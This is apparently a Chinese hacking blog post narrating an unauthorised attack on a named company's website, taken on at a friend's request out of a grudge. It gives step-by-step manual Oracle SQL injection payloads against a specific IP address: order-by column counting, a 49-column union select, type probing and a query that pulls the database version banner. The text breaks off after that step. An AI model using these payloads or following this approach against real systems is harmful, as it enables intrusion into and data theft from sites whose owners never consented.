輕車熟路
　　一個對新飛鴻有意見的親密朋友找我說能不能把這個公司的網(wǎng)站給搞了，我一聽公司，心想，企業(yè)站都是垃圾，好搞，便痛快答應(yīng)(人品真好!)，呵呵，但是后來才發(fā)現(xiàn)沒我想像的那么簡單。
　　

　　asp的頁面，啊d和google掃注入點(diǎn)沒有，意料之中，工具誤差太大!于是旁注，結(jié)果只有這一個站，然后便邊開著流光掃服務(wù)器邊習(xí)慣性的去站上亂逛去手工找注入點(diǎn)，一會的功夫出來一條鏈接，如圖：
　　

　　習(xí)慣性的單引號，如圖
　　

　　很明顯的注入，猜測源碼大體是這樣的:
select XX from XXX where wen='云南';
　　而且數(shù)據(jù)庫類型為oracle，頓時來了精神，很少有這種練手的機(jī)會!估計(jì)服務(wù)器配置肯定不錯!由于這種類型的數(shù)據(jù)庫沒什么好的工具，就直接來手工吧，那樣比較刺激，據(jù)我朋友說這個公司很大，網(wǎng)絡(luò)也很大，數(shù)據(jù)庫量更是大上加大，難怪用oracle呢，所以放棄后臺提權(quán)的想法!首先用union查詢確定字段數(shù)和暴一些敏感資料，提交如下url：
http://211.154.103.15/server2.asp?wen=四川省' order by 20--;
　　返回正確，說明此表字段名大于20，繼續(xù)提交
http://211.154.103.15/server2.asp?wen=四川省' order by 30--；
　　仍然返回正確，經(jīng)過一些列的猜測然后提交，49返回正確，50出錯，確定字段為49個，然后提交以下url：
http://211.154.103.15/server2.asp?wen=四川省' union select NULL,NULL,……,NULL from dual-
　　中間省略，一共49個null， 由于union查詢需要數(shù)據(jù)類型匹配，否則出錯，所以這里用null而不用數(shù)字可以避免類型錯誤，然后提交
http://211.154.103.15/server2.asp?wen=四川省' and 1=2 union select 1,NULL,……,NULL from dual--；
　　出錯顯示類型不匹配，換成

http://211.154.103.15/server2.asp?wen=四川省' and 1=2 union select '1',NULL,……,NULL from dual--;
　　返回正確,說明第一個是字符型的，但是下面對應(yīng)位置并沒有顯示，繼續(xù)按以上方法嘗試后面48個，當(dāng)試到12和13時，下面對應(yīng)位置顯示了，如圖
　　


　　好了，現(xiàn)在我們就要用下面那兩個地方爆我們需要的東西，看下oracle版本，提交
http://211.154.103.15/server2.asp?wen=四川省' and 1=2 union select '1',NULL,……,'11', (select banner from sys.v_$version where rownum=1),'13'……NULL from dual--;

最新評論